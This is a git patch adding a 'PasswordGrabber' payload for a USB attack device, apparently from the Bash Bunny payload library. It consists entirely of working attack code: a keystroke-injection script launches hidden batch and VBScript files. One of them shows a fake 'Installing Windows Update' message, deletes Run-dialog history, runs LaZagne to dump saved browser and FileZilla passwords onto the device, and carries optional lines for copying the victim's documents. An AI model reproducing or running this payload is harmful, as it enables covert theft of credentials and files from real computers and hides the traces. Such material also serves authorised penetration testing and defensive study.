From 2903a16d890d27001c1b6bfb7c09f56d21412530 Mon Sep 17 00:00:00 2001 From: RazerBlade Date: Sun, 16 Apr 2017 11:03:03 +0200 Subject: [PATCH] Added Password Grabber payload (#169) * Add files via upload * Update readme.md * Update e.cmd * Update payload.txt Added 1.1 Firmware support * Update e.cmd Added Date and time functions and added some comments * Delete laZagne.exe * Update readme.md Added support to Hak5 new guidelines * Update readme.md * Update readme.md * Update readme.md * Update readme.md --- payloads/library/PasswordGrabber/d.cmd | 4 +++ payloads/library/PasswordGrabber/e.cmd | 38 ++++++++++++++++++++ payloads/library/PasswordGrabber/i.vbs | 1 + payloads/library/PasswordGrabber/payload.txt | 19 ++++++++++ payloads/library/PasswordGrabber/readme.md | 32 +++++++++++++++++ 5 files changed, 94 insertions(+) create mode 100644 payloads/library/PasswordGrabber/d.cmd create mode 100644 payloads/library/PasswordGrabber/e.cmd create mode 100644 payloads/library/PasswordGrabber/i.vbs create mode 100644 payloads/library/PasswordGrabber/payload.txt create mode 100644 payloads/library/PasswordGrabber/readme.md diff --git a/payloads/library/PasswordGrabber/d.cmd b/payloads/library/PasswordGrabber/d.cmd new file mode 100644 index 00000000..604ef639 --- /dev/null +++ b/payloads/library/PasswordGrabber/d.cmd @@ -0,0 +1,4 @@ +@echo off +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" +cscript %~dp0\i.vbs %~dp0\e.cmd +@exit \ No newline at end of file diff --git a/payloads/library/PasswordGrabber/e.cmd b/payloads/library/PasswordGrabber/e.cmd new file mode 100644 index 00000000..5f8d8d89 --- /dev/null +++ b/payloads/library/PasswordGrabber/e.cmd @@ -0,0 +1,38 @@ +@echo off +@echo Installing Windows Update + +REM Delete registry keys storing Run dialog history +REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f + +REM Creates directory compromised of computer name, date and time +REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious + +REM This executes LaZagne in the current directory and outputs the password file to Loot +REM Time and Date is also added +setlocal +cd /d %~dp0 +%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt + +REM These lines if you just want Passwords and no files. +set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% +mkdir %dst% >>nul + +if Exist %USERPROFILE%\Documents ( +REM /C Continues copying even if errors occur. +REM /Q Does not display file names while copying. +REM /G Allows the copying of encrypted files to destination that does not support encryption. +REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. +REM /E Copies directories and subdirectories, including empty ones. + +REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul + +REM Same as above but does not create empty directories +REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul + +) + +REM Blink CAPSLOCK key +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" + +@cls +@exit diff --git a/payloads/library/PasswordGrabber/i.vbs b/payloads/library/PasswordGrabber/i.vbs new file mode 100644 index 00000000..1ffd3c3e --- /dev/null +++ b/payloads/library/PasswordGrabber/i.vbs @@ -0,0 +1 @@ +CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False diff --git a/payloads/library/PasswordGrabber/payload.txt b/payloads/library/PasswordGrabber/payload.txt new file mode 100644 index 00000000..44a01065 --- /dev/null +++ b/payloads/library/PasswordGrabber/payload.txt @@ -0,0 +1,19 @@ +#!/bin/bash +# +# Title: USB Exfiltrator +# Author: Hak5Darren +# Version: 1.1 +# Target: Windows XP SP3+ +# Props: Diggster, IMcPwn +# Category: Exfiltration +# +# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. +# + +LED ATTACK +ATTACKMODE HID STORAGE +DUCKY_LANG se +RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" +LED FINISH diff --git a/payloads/library/PasswordGrabber/readme.md b/payloads/library/PasswordGrabber/readme.md new file mode 100644 index 00000000..b9f0efb8 --- /dev/null +++ b/payloads/library/PasswordGrabber/readme.md @@ -0,0 +1,32 @@ +# PasswordGrabber + +* Author: RazerBlade +* Creds: Hak5Darren, AlessandroZ +* Version: Version 1.1 +* Firmware support: 1.1 +* Target: Windows + +## Description + +Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... +This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. +Full read here: https://github.com/AlessandroZ/LaZagne + + +## Configuration +By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. +I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy + +Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne +When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go! + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red | Attack Setup | +| Green | Attack Complete | + +## Discussion +[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ +